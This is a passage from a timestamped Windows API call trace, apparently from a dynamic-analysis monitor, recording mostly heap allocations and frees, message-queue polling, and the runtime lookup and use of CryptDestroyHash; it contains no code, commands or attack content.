[0199.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0199.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0199.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0199.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0199.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0199.167] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0199.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0199.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0199.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.168] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0199.168] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.168] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.169] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0199.169] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0199.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0199.170] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0199.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.170] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0199.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.170] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0199.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.170] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0199.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0199.171] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0199.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0199.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.171] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0199.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0199.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0199.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0199.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466db0 [0199.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466db0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0199.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0199.172] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0199.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0199.172] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0199.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0199.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0199.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0199.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0199.173] CryptDestroyHash (hHash=0xaa5660) returned 1 [0199.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0199.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0199.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0199.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0199.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0199.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0199.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0199.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0199.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0199.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0199.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0199.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0199.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0199.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0199.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0199.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0199.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0199.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0199.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0199.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0199.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0199.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0199.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0199.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0199.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0199.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0199.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0199.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0199.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0199.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0199.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0199.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0199.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0199.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0199.175] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0199.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.176] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0199.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0199.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.176] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0199.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0199.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0199.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0199.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0199.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0199.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0199.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0199.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0199.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0199.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0199.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0199.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0199.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0199.178] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0199.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0199.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0199.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0199.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0199.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0199.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0199.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0199.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0199.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0199.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0199.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0199.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0199.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0199.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0199.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0199.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0199.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0199.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0199.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.181] HeapFree (in: 